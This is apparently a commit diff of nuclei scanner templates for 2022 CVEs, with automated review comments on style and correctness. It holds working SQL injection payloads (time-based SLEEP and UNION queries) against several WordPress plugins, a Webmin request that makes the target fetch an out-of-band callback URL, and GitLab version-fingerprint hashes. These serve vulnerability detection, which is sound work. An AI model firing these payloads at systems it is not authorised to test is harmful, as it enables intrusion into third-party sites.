- https://wpscan.com/vulnerability/be895016-7365-4ce4-a54f-f36d0ef2d6f1
- https://wordpress.org/plugins/page-views-count/
@ -38,3 +38,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/12/09
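--- /dev/null
+++ b/PATH-NOT-SHOWN/CVE-2022-0735.yaml
@@ -0,0 +1,100 @@
+id: CVE-2022-0735
+
+info:
+  name: GitLab CE/EE - Runner Registration Token Disclosure
+  author: GitLab Red Team
+  severity: critical
+  description: An issue has been discovered in GitLab CE/EE affecting all versions starting from 12.10 before 14.6.5, all versions starting from 14.7 before 14.7.4, all versions starting from 14.8 before 14.8.2. An unauthorised user was able to steal runner registration tokens through an information disclosure vulnerability using quick actions commands.
+  reference:
+    - https://gitlab.com/gitlab-com/gl-security/threatmanagement/redteam/redteam-public/cve-hash-harvester
+    - https://gitlab.com/gitlab-org/cves/-/blob/master/2022/CVE-2022-0735.json
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0735
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2022-0735
+    cwe-id: CWE-863
+  metadata:
+    shodan-query: http.title:"GitLab"
+  tags: cve,cve2022,gitlab
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/users/sign_in"
+
+    redirects: true
+    max-redirects: 3
+    matchers:
+      - type: word
+        words:
+          - "015d088713b23c749d8be0118caeb21039491d9812c75c913f48d53559ab09df"
+          - "02aa9533ec4957bb01d206d6eaa51d762c7b7396362f0f7a3b5fb4dd6088745b"
+          - "051048a171ccf14f73419f46d3bd8204aa3ed585a72924faea0192f53d42cfce"
+          - "08858ced0ff83694fb12cf155f6d6bf450dcaae7192ea3de8383966993724290"
+          - "0993beabc8d2bb9e3b8d12d24989426b909921e20e9c6a704de7a5f1dfa93c59"
+          - "1832611738f1e31dd00a8293bbf90fce9811b3eea5b21798a63890dbc51769c8"
+          - "1d765038b21c5c76ff8492561c29984f3fa5c4b8cfb3a6c7b216ac8ab18b78c7"
+          - "1d840f0c4634c8813d3056f26cbab7a685d544050360a611a9df0b42371f4d98"
+          - "27d2c4c4e2fcf6e589e3e1fe85723537333b087003aa4c1d2abcf74d5c899959"
+          - "2cb8d6d6d17f1b1b8492581de92356755b864cbb6e48347a65baa2771a10ae4f"
+          - "2ea7e9be931f24ebc2a67091b0f0ff95ba18e386f3d312545bb5caaac6c1a8be"
+          - "301b60d2c71a595adfb65b22edee9023961c5190e1807f6db7c597675b0a61f0"
+          - "30a9dffe86b597151eff49443097496f0d1014bb6695a2f69a7c97dc1c27828f"
+          - "383b8952f0627703ada7774dd42f3b901ea2e499fd556fce3ae0c6d604ad72b7"
+          - "4448d19024d3be03b5ba550b5b02d27f41c4bdba4db950f6f0e7136d820cd9e1"
+          - "450cbe5102fb0f634c533051d2631578c8a6bae2c4ef1c2e50d4bfd090ce3b54"
+          - "455d114267e5992b858fb725de1c1ddb83862890fe54436ffea5ff2d2f72edc8"
+          - "4990bb27037f3d5f1bffc0625162173ad8043166a1ae5c8505aabe6384935ce2"
+          - "4abc4e078df94075056919bd59aed6e7a0f95067039a8339b8f614924d8cb160"
+          - "4f233d907f30a050ca7e40fbd91742d444d28e50691c51b742714df8181bf4e7"
+          - "50d9206410f00bb00cc8f95865ab291c718e7a026e7fdc1fc9db0480586c4bc9"
+          - "515dc29796a763b500d37ec0c765957a136c9e1f1972bb52c3d7edcf4b6b8bbe"
+          - "52560ba2603619d2ff1447002a60dcb62c7c957451fb820f1894e1ce7c23821c"
+          - "57e83f1a3cf7c0fe3cf2357802306688dab60cf6a30d00e14e67826070db92de"
+          - "5cd37ee959b5338b5fb48eafc6c7290ca1fa60e653292304102cc19a16cc25e4"
+          - "5df2cb13ec314995ea43d698e888ddb240dbc7ccb6e635434dc8919eced3e25f"
+          - "62e4cc014d9d96f9cbf443186289ffd9c41bdfe951565324891dcf38bcca5a51"
+          - "655ad8aea57bdaaad10ff208c7f7aa88c9af89a834c0041ffc18c928cc3eab1f"
+          - "6ae610d783ba9a520b82263f49d2907a52090fecb3ac37819cea12b67e6d94fb"
+          - "6fa9fec63ba24ec06fcae0ec30d1369619c2c3323fe9ddc4849af86457d59eef"
+          - "775f130d36e9eb14cb67c6a63551511b87f78944cebcf6cdddb78292030341df"
+          - "79837fd1939f90d58cc5a842a81120e8cecbc03484362e88081ebf3b7e3830e9"
+          - "7f1c7b2bfaa6152740d453804e7aa380077636cad101005ed85e70990ec20ec5"
+          - "81c5f2c7b2c0b0abaeb59585f36904031c21b1702c24349404df52834fbd7ad3"
+          - "8b78708916f28aa9e54dacf9c9c08d720837ce78d8260c36c0f828612567d353"
+          - "90abf7746df5cb82bca9949de6f512de7cb10bec97d3f5103299a9ce38d5b159"
+          - "969119f639d0837f445a10ced20d3a82d2ea69d682a4e74f39a48a4e7b443d5e"
+          - "a0c92bafde7d93e87af3bc2797125cba613018240a9f5305ff949be8a1b16528"
+          - "a4333a9de660b9fc4d227403f57d46ec275d6a6349a6f5bda0c9557001f87e5d"
+          - "a573aed3df818ca78ab40c01ae3514e16271a18e3c83122deab5d5623b25d4fe"
+          - "a624c11e908db556820e9b07de96e0a465e9be5d5e6b68cdafe6d5c95c99798b"
+          - "a8bf3d1210afa873d9b9af583e944bdbf5ac7c8a63f6eccc3d6795802bd380d2"
+          - "a9308f85e95b00007892d451fd9f6beabcd8792b4c5f8cd7524ba7e941d479c9"
+          - "ac9b38e86b6c87bf8db038ae23da3a5f17a6c391b3a54ad1e727136141a7d4f5"
+          - "ae0edd232df6f579e19ea52115d35977f8bdbfa9958e0aef2221d62f3a39e7d8"
+          - "b50bfeb87fe7bb245b31a0423ccfd866ca974bc5943e568ce47efb4cd221d711"
+          - "ba74062de4171df6109c4c96da1ebe2b538bb6cc7cd55867cbdfba44777700e1"
+          - "be9a23d3021354ec649bc823b23eab01ed235a4eb730fd2f4f7cdb2a6dee453a"
+          - "bf1ba5d5d3395adc5bad6f17cc3cb21b3fb29d3e3471a5b260e0bc5ec7a57bc4"
+          - "bf1c397958ee5114e8f1dadc98fa9c9d7ddb031a4c3c030fa00c315384456218"
+          - "c8d8d30d89b00098edab024579a3f3c0df2613a29ebcd57cdb9a9062675558e4"
+          - "c91127b2698c0a2ae0103be3accffe01995b8531bf1027ae4f0a8ad099e7a209"
+          - "c923fa3e71e104d50615978c1ab9fcfccfcbada9e8df638fc27bf4d4eb72d78c"
+          - "cfa6748598b5e507db0e53906a7639e2c197a53cb57da58b0a20ed087cc0b9d5"
+          - "d0850f616c5b4f09a7ff319701bce0460ffc17ca0349ad2cf7808b868688cf71"
+          - "d161b6e25db66456f8e0603de5132d1ff90f9388d0a0305d2d073a67fd229ddb"
+          - "e2578590390a9eb10cd65d130e36503fccb40b3921c65c160bb06943b2e3751a"
+          - "e355f614211d036d0b3ffac4cd76da00d89e05717df61629e82571e20ac27488"
+          - "e539e07c389f60596c92b06467c735073788196fa51331255d66ff7afde5dfee"
+          - "ec9dfedd7bd44754668b208858a31b83489d5474f7606294f6cc0128bb218c6d"
+          - "f154ef27cf0f1383ba4ca59531058312b44c84d40938bc8758827023db472812"
+          - "f8ba2470fbf1e30f2ce64d34705b8e6615ac964ea84163c8a6adaaf8a91f9eac"
+          - "f9ab217549b223c55fa310f2007a8f5685f9596c579f5c5526e7dcb204ba0e11"
+        condition: or
+
+    extractors:
+      - type: regex
+        group: 1
+        regex:
+          - '(?:application-)(\S{64})(?:\.css)'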
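Review bot: The word matcher is a list of 63 bare hex strings with no comment saying what they are, so a reader cannot tell that a hit means the instance serves an `application-<hash>.css` bundle the cve-hash-harvester reference associates with a vulnerable GitLab build, i.e. a version fingerprint rather than an exercise of the token disclosure. A comment above `matchers:` such as `# sha256 names of application-*.css bundles shipped by vulnerable GitLab releases (see cve-hash-harvester); a match fingerprints the build, it does not exercise the disclosure` would set expectations before a critical-severity finding is escalated. The `metadata` block also omits the `verified` key that the other new templates in this commit carry.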
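--- /dev/null
+++ b/PATH-NOT-SHOWN/CVE-2022-0785.yaml
@@ -0,0 +1,38 @@
+id: CVE-2022-0785
+
+info:
+  name: WordPress Daily Prayer Time <2022.03.01 - SQL Injection
+  author: theamanrawat
+  severity: critical
+  description: |
+    WordPress Daily Prayer Time plugin prior to 2022.03.01 contains a SQL injection vulnerability.. It does not sanitise and escape the month parameter before using it in a SQL statement via the get_monthly_timetable AJAX action, available to unauthenticated users, leading to SQL injection.
+  reference:
+    - https://wpscan.com/vulnerability/e1e09f56-89a4-4d6f-907b-3fb2cb825255
+    - https://wordpress.org/plugins/daily-prayer-time-for-mosques/
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-0785
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2022-0785
+    cwe-id: CWE-89
+  metadata:
+    verified: "true"
+  tags: sqli,wordpress,wp-plugin,unauth,daily-prayer-time-for-mosques,wpscan,cve,cve2022,wp
+
+requests:
+  - raw:
+      - |
+        @timeout: 10s
+        GET /wp-admin/admin-ajax.php?action=get_monthly_timetable&month=1+AND+(SELECT+6881+FROM+(SELECT(SLEEP(6)))iEAn) HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'duration>=6'
+          - 'status_code == 200'
+          - 'contains(content_type, "text/html")'
+          - 'contains(body, "dptTimetable customStyles dptUserStyles")'
+        condition: and
+
+# Enhanced by md on 2022/12/09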
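Review bot: The description has a doubled period in `contains a SQL injection vulnerability.. It does not sanitise`; it should read `contains a SQL injection vulnerability. It does not sanitise`. Nothing else in the section needs changing.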
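--- /dev/null
+++ b/PATH-NOT-SHOWN/CVE-2022-0786.yaml
@@ -0,0 +1,33 @@
+id: CVE-2022-0786
+
+info:
+  name: KiviCare < 2.3.9 - Unauthenticated SQLi
+  author: theamanrawat
+  severity: critical
+  description: |
+    The plugin does not sanitise and escape some parameters before using them in SQL statements via the ajax_post AJAX action with the get_doctor_details route, leading to SQL Injections exploitable by unauthenticated users.
+  reference:
+    - https://wpscan.com/vulnerability/53f493e9-273b-4349-8a59-f2207e8f8f30
+    - https://wordpress.org/plugins/kivicare-clinic-management-system/
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-0786
+  classification:
+    cve-id: CVE-2022-0786
+  metadata:
+    verified: "true"
+  tags: cve,cve2022,wordpress,wp-plugin,wp,sqli,kivicare-clinic-management-system,unauth
+
+requests:
+  - raw:
+      - |
+        @timeout: 10s
+        GET /wp-admin/admin-ajax.php?action=ajax_get&route_name=get_doctor_details&clinic_id=%7B"id":"1"%7D&props_doctor_id=1,2)+AND+(SELECT+42+FROM+(SELECT(SLEEP(6)))b HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'duration>=6'
+          - 'status_code == 200'
+          - 'contains(content_type, "text/html")'
+          - 'contains(body, "Doctor details")'
+        condition: and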
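Review bot: The description says the flaw is reached `via the ajax_post AJAX action with the get_doctor_details route`, but the request sends `action=ajax_get&route_name=get_doctor_details`; one of the two is wrong, and the description should name the action the template actually issues. The section also departs from the other new templates in this commit: the name `KiviCare < 2.3.9 - Unauthenticated SQLi` does not follow the `WordPress <plugin> <version - SQL Injection` form used for CVE-2022-0349, CVE-2022-0785 and CVE-2022-0788, the description is the raw advisory text starting with `The plugin`, and `classification` carries only `cve-id` with no `cvss-metrics`, `cvss-score` or `cwe-id`.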
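--- /dev/null
+++ b/PATH-NOT-SHOWN/CVE-2022-0788.yaml
@@ -0,0 +1,41 @@
+id: CVE-2022-0788
+
+info:
+  name: WordPress WP Fundraising Donation and Crowdfunding Platform <1.5.0 - SQL Injection
+  author: theamanrawat
+  severity: critical
+  description: |
+    WordPress WP Fundraising Donation and Crowdfunding Platform plugin before 1.5.0 contains an unauthenticated SQL injection vulnerability. It does not sanitize and escape a parameter before using it in a SQL statement via a REST route. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
+  reference:
+    - https://wpscan.com/vulnerability/fbc71710-123f-4c61-9796-a6a4fd354828
+    - https://wordpress.org/plugins/wp-fundraising-donation/
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-0788
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2022-0788
+    cwe-id: CWE-89
+  metadata:
+    verified: "true"
+  tags: cve,sqli,wordpress,wp-plugin,cve2022,wp,wp-fundraising-donation,unauth,wpscan
+
+requests:
+  - raw:
+      - |
+        @timeout: 10s
+        GET /index.php?rest_route=/xs-donate-form/payment-redirect/3 HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"id": "(SELECT 1 FROM (SELECT(SLEEP(6)))me)", "formid": "1", "type": "online_payment"}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'duration>=6'
+          - 'status_code == 200'
+          - 'contains(content_type, "application/json")'
+          - 'contains(body, "Invalid payment.")'
+        condition: and
+
+# Enhanced by md on 2022/12/09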
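Review bot: The raw request is a `GET` that carries a JSON body (the `{"id": …}` line after the blank line); a body on GET has no defined semantics and some servers and intermediaries discard it, in which case the `id` value never reaches the route and the check silently reports nothing rather than failing. If the REST route reads the same body on POST, switching the method would make the probe deterministic; if GET is intentional because that is how the route is registered, a comment such as `# the payment-redirect route reads the JSON body on GET` above the request would record that for the next maintainer.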
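--- /dev/null
+++ b/PATH-NOT-SHOWN/CVE-2022-0817.yaml
@@ -0,0 +1,43 @@
+id: CVE-2022-0817
+
+info:
+  name: WordPress BadgeOS <=3.7.0 - SQL Injection
+  author: theamanrawat
+  severity: critical
+  description: |
+    WordPress BadgeOS plugin through 3.7.0 contains a SQL injection vulnerability. It does not sanitize and escape a parameter before using it in a SQL statement via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
+  reference:
+    - https://wpscan.com/vulnerability/69263610-f454-4f27-80af-be523d25659e
+    - https://wordpress.org/plugins/badgeos/
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-0817
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2022-0817
+    cwe-id: CWE-89
+  metadata:
+    verified: "true"
+  tags: cve2022,wp,unauth,sqli,cve,wp-plugin,badgeos,wpscan,wordpress
+
+variables:
+  num: "999999999"
+
+requests:
+  - raw:
+      - |
+        POST /wp-admin/admin-ajax.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        action=get-achievements&total_only=true&user_id=11 UNION ALL SELECT NULL,CONCAT(1,md5({{num}}),1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - "contains(body, md5(num))"
+          - 'contains(content_type, "application/json")'
+          - 'contains(body, "badgeos-arrange-buttons")'
+        condition: and
+
+# Enhanced by md on 2022/12/09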
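--- /dev/null
+++ b/PATH-NOT-SHOWN/CVE-2022-0824.yaml
@@ -0,0 +1,52 @@
+id: CVE-2022-0824
+
+info:
+  name: Webmin prior to 1.990 - Improper Access Control to Remote Code Execution
+  author: cckuailong
+  severity: high
+  description: Improper Access Control to Remote Code Execution in GitHub repository webmin/webmin prior to 1.990.
+  reference:
+    - https://github.com/faisalfs10x/Webmin-CVE-2022-0824-revshell/blob/main/Webmin-revshell.py
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-0824
+    - https://github.com/webmin/webmin/commit/39ea464f0c40b325decd6a5bfb7833fa4a142e38
+    - https://huntr.dev/bounties/d0049a96-de90-4b1a-9111-94de1044f295
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 8.8
+    cve-id: CVE-2022-0824
+    cwe-id: CWE-284
+  tags: rce,oss,huntr,cve,cve2022,webmin,authenticated
+
+requests:
+  - raw:
+      - |
+        POST /session_login.cgi HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        Cookie: redirect=1;testing=1;PHPSESSID=;
+
+        user={{username}}&pass={{password}}
+
+      - |
+        POST /extensions/file-manager/http_download.cgi?module=filemin HTTP/1.1
+        Host: {{Hostname}}
+        Accept: application/json, text/javascript, */*; q=0.01
+        Accept-Encoding: gzip, deflate
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+        X-Requested-With: XMLHttpRequest
+        Referer: {{RootURL}}/filemin/?xnavigation=1
+
+        link=http://{{interactsh-url}}&username=&password=&path=/{{ranstr}}
+
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "dns"
+
+      - type: word
+        part: body
+        words:
+          - "Failed to write to /{{ranstr}}/index.html"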
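Review bot: `{{ranstr}}` in the `path=/{{ranstr}}` body and in the `Failed to write to /{{ranstr}}/index.html` word is not a nuclei generator; the helper used elsewhere in this commit is `{{randstr}}` (see the elFinder template), so both occurrences should read `randstr`. With the typo the placeholder is sent and matched literally, which still produces a consistent string but loses the per-run randomness the author intended. The first request also reads `{{username}}` and `{{password}}` with no `payloads` or `variables` block in the section, so they must be supplied at run time; a comment above `requests:` saying so would save operators a silently failing login.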
@ -0,0 +1,39 @@
|
|||
id: CVE-2022-0826
|
||||
|
||||
info:
|
||||
name: WP Video Gallery <= 1.7.1 - Unauthenticated SQLi
|
||||
author: theamanrawat
|
||||
severity: critical
|
||||
description: |
|
||||
The WP Video Gallery WordPress plugin through 1.7.1 does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action, leading to an SQL Injection exploitable by unauthenticated users.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/7a3eed3b-c643-4e24-b833-eba60ab631c5
|
||||
- https://wordpress.org/plugins/wp-video-gallery-free/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-0826
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2022-0826
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
verified: true
|
||||
tags: cve2022,wp-plugin,wpscan,cve,wordpress,wp,sqli,wp-video-gallery-free,unauth
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
@timeout: 15s
|
||||
POST /wp-admin/admin-ajax.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
action=wp_video_gallery_ajax_add_single_youtube&url=http://example.com/?x%26v=1%2522 AND (SELECT 1780 FROM (SELECT(SLEEP(6)))uPaz)%2523
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=6'
|
||||
- 'status_code == 200'
|
||||
- 'contains(content_type, "text/html")'
|
||||
- 'contains(body, "Registred videos :")'
|
||||
condition: and
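Review bot: `verified: true` in the `metadata` block is an unquoted YAML boolean, whereas the sibling hunks for CVE-2022-0867, CVE-2022-0948, CVE-2022-1442 and CVE-2022-1595 all write `verified: "true"`; a consumer that reads metadata values as strings sees a bool here and a string there. Quote it as `verified: "true"` to match the other templates. The `duration>=6` DSL term is the only signal that the injection fired — the `status_code`, `content_type` and body checks only confirm the AJAX endpoint answered — so a slow target can surface as a hit; a comment above the matcher such as `# time-based check: a single >=6s response on a slow host can false-positive, rerun to confirm` would make that explicit to operators.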
|
|
@ -0,0 +1,46 @@
|
|||
id: CVE-2022-0867
|
||||
|
||||
info:
|
||||
name: WordPress ARPrice <3.6.1 - SQL Injection
|
||||
author: theamanrawat
|
||||
severity: critical
|
||||
description: |
|
||||
WordPress ARPrice plugin prior to 3.6.1 contains a SQL injection vulnerability. It fails to properly sanitize and escape user supplied POST data before being inserted in an SQL statement and executed via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/62803aae-9896-410b-9398-3497a838e494
|
||||
- https://wordpress.org/plugins/arprice-responsive-pricing-table/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-0867
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2022-0867
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: unauth,wp,cve2022,wordpress,wp-plugin,arprice-responsive-pricing-table,sqli,wpscan,cve
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
@timeout: 10s
|
||||
POST /wp-admin/admin-ajax.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
action=arplite_insert_plan_id&arp_plan_id=x&arp_template_id=1+AND+(SELECT+8948+FROM+(SELECT(SLEEP(6)))iIic)
|
||||
|
||||
- |
|
||||
GET /wp-content/plugins/arprice-responsive-pricing-table/js/arprice.js HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
req-condition: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration_1>=6'
|
||||
- 'status_code_1 == 200'
|
||||
- 'contains(content_type_1, "text/html")'
|
||||
- 'contains(body_2, "ArpPriceTable")'
|
||||
condition: and
|
||||
|
||||
# Enhanced by md on 2022/12/09
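Review bot: `@timeout: 10s` on the first raw request leaves only 4s of headroom over the 6s `SLEEP` the payload injects, while the CVE-2022-0826 and CVE-2022-0948 hunks use `@timeout: 15s` for the same 6s delay. A response that takes longer than the timeout on a slow host is dropped before `duration_1>=6` can be evaluated, so the template fails closed with a silent false negative. Raising it to `@timeout: 15s` keeps the three time-based templates consistent.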
|
|
@ -30,6 +30,7 @@ requests:
|
|||
words:
|
||||
- "PHP Extension"
|
||||
- "PHP Version"
|
||||
- "<!DOCTYPE html"
|
||||
condition: and
|
||||
|
||||
- type: status
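Review bot: The added `- "<!DOCTYPE html"` word is matched case-sensitively under `condition: and`, so a page that emits the HTML5 `<!doctype html>` form fails the whole matcher even when `PHP Extension` and `PHP Version` are both present. If the intent is only to require an HTML document, `case-insensitive: true` on this matcher avoids that gap (presumably supported by the nuclei version this repo targets — confirm). The enclosing matcher begins before this hunk, so its `part:` is not visible here.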
|
||||
|
|
|
@ -0,0 +1,45 @@
|
|||
id: CVE-2022-0948
|
||||
|
||||
info:
|
||||
name: Order Listener for WooCommerce < 3.2.2 - Unauthenticated SQLi
|
||||
author: theamanrawat
|
||||
severity: critical
|
||||
description: |
|
||||
The Order Listener for WooCommerce WordPress plugin before 3.2.2 does not sanitise and escape the id parameter before using it in a SQL statement via a REST route available to unauthenticated users, leading to an SQL injection.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/daad48df-6a25-493f-9d1d-17b897462576
|
||||
- https://wordpress.org/plugins/woc-order-alert/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-0948
|
||||
- https://plugins.trac.wordpress.org/changeset/2707223
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2022-0948
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: cve,wp,unauth,sqli,woc-order-alert,wpscan,cve2022,wordpress,wp-plugin
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
@timeout: 15s
|
||||
POST /?rest_route=/olistener/new HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
content-type: application/json
|
||||
|
||||
{"id":" (SLEEP(6))#"}
|
||||
|
||||
- |
|
||||
GET /wp-content/plugins/woc-order-alert/assets/admin/js/scripts.js HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
req-condition: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration_1>=6'
|
||||
- 'status_code_1 == 200'
|
||||
- 'contains(content_type_1, "application/json")'
|
||||
- 'contains(body_2, "olistener-action.olistener-controller")'
|
||||
condition: and
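Review bot: The raw request writes the header as `content-type: application/json` while every other raw block in this diff writes `Content-Type`; HTTP header names are case-insensitive so this is not a functional defect, but the mixed casing reads as a typo. Changing it to `Content-Type: application/json` keeps the raw blocks uniform across the templates.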
|
|
@ -1,11 +1,11 @@
|
|||
id: CVE-2022-1007
|
||||
|
||||
info:
|
||||
name: Advanced Booking Calendar < 1.7.1 - Cross-Site Scripting
|
||||
name: WordPress Advanced Booking Calendar <1.7.1 - Cross-Site Scripting
|
||||
author: 8arthur
|
||||
severity: medium
|
||||
description: |
|
||||
The Advanced Booking Calendar WordPress plugin before 1.7.1 does not sanitise and escape the room parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting issue
|
||||
WordPress Advanced Booking Calendar plugin before 1.7.1 contains a cross-site scripting vulnerability. It does not sanitize and escape the room parameter before outputting it back in an admin page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/6f5b764b-d13b-4371-9cc5-91204d9d6358
|
||||
- https://wordpress.org/plugins/advanced-booking-calendar/
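Review bot: The rewritten description drops the "Reflected" qualifier the old text carried (`leading to a Reflected Cross-Site Scripting issue`), so the new wording no longer says which XSS variant this is, although the mechanics it describes — the `room` parameter echoed back on an admin page — are reflected XSS. Suggest opening with `WordPress Advanced Booking Calendar plugin before 1.7.1 contains a reflected cross-site scripting vulnerability.` The rest of the `reference` list and the request section are outside this hunk.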
|
||||
|
@ -42,3 +42,5 @@ requests:
|
|||
- "contains(all_headers_2, 'text/html')"
|
||||
- "status_code_2 == 200"
|
||||
condition: and
|
||||
|
||||
# Enhanced by md on 2022/12/09
|
||||
|
|
|
@ -1,11 +1,11 @@
|
|||
id: CVE-2022-1057
|
||||
|
||||
info:
|
||||
name: Pricing Deals for WooCommerce < 2.0.3 - Unauthenticated SQL Injection
|
||||
name: WordPress Pricing Deals for WooCommerce <=2.0.2.02 - SQL Injection
|
||||
author: theamanrawat
|
||||
severity: critical
|
||||
description: |
|
||||
The Pricing Deals for WooCommerce WordPress plugin through 2.0.2.02 does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to an unauthenticated SQL injection.
|
||||
WordPress Pricing Deals for WooCommerce plugin through 2.0.2.02 contains a SQL injection vulnerability. The plugin does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/7c33ffc3-84d1-4a0f-a837-794cdc3ad243
|
||||
- https://wordpress.org/plugins/pricing-deals-for-woocommerce/
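Review bot: The new name and description both lose the "unauthenticated" precondition the old text stated twice (`Unauthenticated SQL Injection` in the name, `available to unauthenticated users` in the description), so the info block now understates the exposure that the critical severity is based on. Suggest keeping it in the new wording, e.g. `... before using it in a SQL statement via an AJAX action available to unauthenticated users.` The tags and request section of the file are outside this hunk, so whether they still carry the unauth marker is not visible here.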
|
||||
|
@ -33,3 +33,5 @@ requests:
|
|||
- 'status_code == 500'
|
||||
- 'contains(body, "been a critical error")'
|
||||
condition: and
|
||||
|
||||
# Enhanced by md on 2022/12/09
|
||||
|
|
|
@ -0,0 +1,43 @@
|
|||
id: CVE-2022-1162
|
||||
|
||||
info:
|
||||
name: GitLab CE/EE - Hardcoded password
|
||||
author: GitLab Red Team
|
||||
severity: critical
|
||||
description: A hardcoded password was set for accounts registered using an OmniAuth provider (e.g. OAuth, LDAP, SAML) in GitLab CE/EE versions 14.7 prior to 14.7.7, 14.8 prior to 14.8.5, and 14.9 prior to 14.9.2 allowing attackers to potentially take over accounts. This template attempts to passively identify vulnerable versions of GitLab without the need for an exploit by matching unique hashes for the application-<hash>.css file in the header for unauthenticated requests. Positive matches do not guarantee exploitability. Tooling to find relevant hashes based on the semantic version ranges specified in the CVE is linked in the references section below.
|
||||
reference:
|
||||
- https://gitlab.com/gitlab-com/gl-security/threatmanagement/redteam/redteam-public/cve-hash-harvester
|
||||
- https://gitlab.com/gitlab-org/cves/-/blob/master/2022/CVE-2022-1162.json
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1162
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2022-1162
|
||||
cwe-id: CWE-798
|
||||
metadata:
|
||||
shodan-query: http.title:"GitLab"
|
||||
tags: cve,cve2022,gitlab
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/users/sign_in"
|
||||
|
||||
redirects: true
|
||||
max-redirects: 3
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "003236d7e2c5f1f035dc8b67026d7583ee198b568932acd8faeac18cec673dfa"
|
||||
- "1d840f0c4634c8813d3056f26cbab7a685d544050360a611a9df0b42371f4d98"
|
||||
- "6eb5eaa5726150b8135a4fd09118cfd6b29f128586b7fa5019a04f1c740e9193"
|
||||
- "6fa9fec63ba24ec06fcae0ec30d1369619c2c3323fe9ddc4849af86457d59eef"
|
||||
